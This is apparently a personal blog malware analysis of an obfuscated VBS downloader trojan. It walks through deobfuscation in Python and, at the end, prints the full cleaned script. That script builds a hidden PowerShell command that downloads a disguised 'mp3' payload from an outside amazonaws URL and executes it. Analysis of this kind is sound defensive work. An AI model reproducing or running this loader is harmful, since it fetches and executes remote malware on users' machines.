Malware Analysis - VBS mp3 Downloader
Hi ! Here is a Simple Malware Analysis of a VBS script I found on Malware Bazaar !
Enjoy !
Identification
| Name | 71f51f194201d9d3a86fa99255909017632302bd7007b50b400490a5cd4a4043.vbs |
|---|---|
| Hash (256) | 3dbfb4bcbc5432a332fa3f21ffcefcf2cbf1c990 |
| Size | 71K |
| From | https://bazaar.abuse.ch/download/71f51f194201d9d3a86fa99255909017632302bd7007b50b400490a5cd4a4043/ |
VBS - Code
Hello There !
Today we are going to check a VBS code and see what’s inside.
Here is the VT result, only 17 EDR trigger this file as malicious. We can see some title and tags, it seems to be a downloader trojan.
Clear code - comments
First we need to clear the comment since there are a lot of these in the code. Comments are use very often inside script file such as VBS to blur the tracks.
There are like 30 lines of comments and since we don’t need them we can get rid of them using the Search & Replace option on Sublime Text (CTRL+H)
Using this regex ^.*msad.*\n we select all the comments and the replace is not fill, the comments are done and the code is more readable but still a mess.
All the code is present in the screen
Clear code - First Variables
We can see some strings variables at the start, if we look quickly into it we can see some readable text like System, Replace() and an interesting URL ate.amazonaws.com/1643406871-d.mp3. Looks like C&C url or malware url but for now, let’s keep going.
I paste the variable inside a python script and renamed them with var followed by a number to be more convinient.
This technique of obfuscation is well known, these long strings contain actual readable code between trash characters, the readable strings are extracted and then executed, this is an obfucation method used to by-pass any antivirus that would ask too many questions on the content of a file.
Sometimes you can see random code and random function called between malicious code just to fool EDRs
Belowe the 9 variables we can see another variable using a replace statement
diTG = replace("WYePOcript.YePOhEll","YePO","s")
Using the ame method but in python gives us the name of the shell file here Wscript.shell
The Idea is to do the same using a python script on the 9 var and see what they have to offer.
The result is not really explicit since it appears to be another obsfucation method, like the first one.
In this otput we start to see some PowerShell code and most of all the full URL
https://v3-fastupload.s3-accelerate.amazonaws.com/1643406871-d.mp3
We could stop the analysis since we got the URL that seems to download the real malware here but let’s keep going.
Here is the previous python output in a better view and renamed variables
Since this is a PowerShell script, we can clearly see wha’t going on here. Like we did in python, this script is doing the same and join every string variable into one $final_var. Let’s create the same code in python and check the content of this $final_var shall we.
another_var1='(NixwTc6t'.replace('ixwTc6t','ew-')
another_var2 = '8hZqv4S '.replace('8hZqv4S','Object')
another_var3 = 'N10t1mbR'.replace('10t1mbR','et')
another_var4 = '.WVImHNDj'.replace('VImHNDj','e')
another_var5='.D3Z279nZ'.replace('3Z279nZ','ownlo')
another_var6= 'bfqeWWCp'.replace('fqeWWCp','Client)')
another_var7='adString("https://v3-fastupload.s3-accelerate.amazonaws.com/1643406871-d.mp3")'
final_var= another_var1 + another_var2 + another_var3 + another_var4 + another_var6 + another_var5 + another_var7
print(final_var)
As expected, this PowerShell command line is downloading the mp3 file located at this URL, this is 100% sure the location of the real malware.
Don’t forget the CreateObject() function used before the replace function.
The CreateObject function creates an object of a specified type. Here the shell file.
Set GmrK = CreateObject(wscipt_shell)
Clear code - Last part
Here is the last part with clear variable name.
We can see two variable creation, one used to store the content of the powershell command to call powershell.exe on a windows prompt.
Then the second one that I rename powerhell_full_cmd_download , used to store the full powershell command with the powerhell call.
The InStr() function does not seem to do anything since it compare the number of characters in the powershell command and then check if superior to zero then do nothing.
At the and we can see the Object of wscript.shell running the powershell command to download its content on the computer.
VBS - mp3
I still manage to download the mp3 file using wget on my linux.
Unfortunatly there is not part2 since I lost the final part 👺
clear-code.vbs
Here is the cleared VBS code
on error resume next
Dim var1,var2,var3,var4,var5,var6,var7,var8,var9
var1 = " $6!/*!\!7!/*!\!1!/*!\!4!/*!\!4LvLJJRX=6!/*!\!7!/*!\!1!/*!\!4!/*!\!4'(N6!/*!\!7!/*!\!1!/*!\!4!/*!\!4ixwTc6t6!/*!\!7!/*!\!1!/*!\!4!/*!\!4'.Replace(6!/*!\!7!/*!\!1!/*!\!4!/*!\!4'6!/*!\!7!/*!\!1!/*!\!4!/*!\!4ixwTc6t6!/*!\!7!/*!\!1!/*!\!4!/*!\!4',6!/*!\!7!/*!\!1!/*!\!4!/*!\!4'ew-6!/*!\!7!/*!\!1!/*!\!4!/*!\!4');"
var2 = "[7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5System.Thr7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5eading.Th7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5read]::Sl7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5eep(153);$7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!55wQo1Xb = 7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5'7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!58hZqv4S 7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5'.Replace(7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5'7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!58hZqv4S7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5',7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5'Object7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5');"
var3 = "$7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1xji96z8 = '7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1N10t1mbR'7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1.Replace('10t1mbR7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1','et');$msqT7OS = '.WVImHNDj'.Replace('VImHNDj',7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1'e7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1');"
var4 = "3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2[System.T3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2hreading.Thr3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2ead]::Sl3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2eep(690);$ofZFAIi='.D3Z279nZ'.Replace(3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2'3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!23Z279nZ3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2',3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2'ownlo3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2'3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2);"
var5 = "$1!/*!\!!/*!\!!/*!\!!/*!\!1!/*!\!!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!!/*!\!7!/*!\!!/*!\!!/*!\!!/*!\!5j7i23VG1!/*!\!!/*!\!!/*!\!!/*!\!1!/*!\!!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!!/*!\!7!/*!\!!/*!\!!/*!\!!/*!\!5 = 'bfqeWWCp'.Replace('fqeWWCp','Cl1!/*!\!!/*!\!!/*!\!!/*!\!1!/*!\!!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!!/*!\!7!/*!\!!/*!\!!/*!\!!/*!\!5ient)');$D2buXdn='adString(''htt1!/*!\!!/*!\!!/*!\!!/*!\!1!/*!\!!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!!/*!\!7!/*!\!!/*!\!!/*!\!!/*!\!5ps://v3-fastupload.s3-acceler"
var6 = "0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9ate.amazonaws.com/1643406871-d.mp3'')';[Sy0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9stem.Th0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9reading.Thre0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9ad]::Sl0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9eep(408)0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9;"
var7 = "8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!6$2WigeHE=I`E8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!6`X ($LvLJJRX8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!6,$8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!65wQo1Xb,$8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!6xji96z8,"
var8 = "$9!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!6!/*!\!!/*!\!!/*!\!4msqT7OS9!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!6!/*!\!!/*!\!!/*!\!4,$9!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!6!/*!\!!/*!\!!/*!\!4j7i23VG9!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!6!/*!\!!/*!\!!/*!\!4,"
var9 = "$0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3ofZFAIi0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3,$0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3D2buXdn -Jo0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3in ''0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3)|I`E`0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3X"
wscript_name = replace("WYePOcript.YePOhEll","YePO","s")
Set Object_wscript = CreateObject(wscript_name)
var1 = Replace(var1, "6!/*!\!7!/*!\!1!/*!\!4!/*!\!4", "")
var2 = Replace(var2, "7!/*!\!!/*!\!6!/*!\!!/*!\!1!/*!\!!/*!\!8!/*!\!!/*!\!5", "")
var3 = Replace(var3, "7!/*!\!!/*!\!4!/*!\!!/*!\!7!/*!\!!/*!\!8!/*!\!!/*!\!1", "")
var4 = Replace(var4, "3!/*!\!!/*!\!!/*!\!5!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!2", "")
var5 = Replace(var5, "1!/*!\!!/*!\!!/*!\!!/*!\!1!/*!\!!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!!/*!\!7!/*!\!!/*!\!!/*!\!!/*!\!5", "")
var6 = Replace(var6, "0!/*!\!!/*!\!4!/*!\!!/*!\!4!/*!\!!/*!\!5!/*!\!!/*!\!9", "")
var7 = Replace(var7, "8!/*!\!/*!\!!7!/*!\!/*!\!!4!/*!\!/*!\!!8!/*!\!/*!\!!6", "")
var8 = Replace(var8, "9!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!3!/*!\!!/*!\!!/*!\!6!/*!\!!/*!\!!/*!\!4", "")
var9 = Replace(var9, "0!/*!\!!/*!\!!/*!\!!/*!\!9!/*!\!!/*!\!!/*!\!!/*!\!4!/*!\!!/*!\!!/*!\!!/*!\!8!/*!\!!/*!\!!/*!\!!/*!\!3", "")
Dim powershell_full_cmd_download
Dim powershell_exe
powershell_exe = Replace("198034638323898147433896822085shell","198034638323898147433896822085","power")
If InStr(var1,var2,var3,var4,var5,var6,var7,var8,var9, "") > 0 Then
End If
powershell_full_cmd_download = powershell_exe+var1+var2+var3+var4+var5+var6+var7+var8+var9
Object_wscript.Run powershell_full_cmd_download,0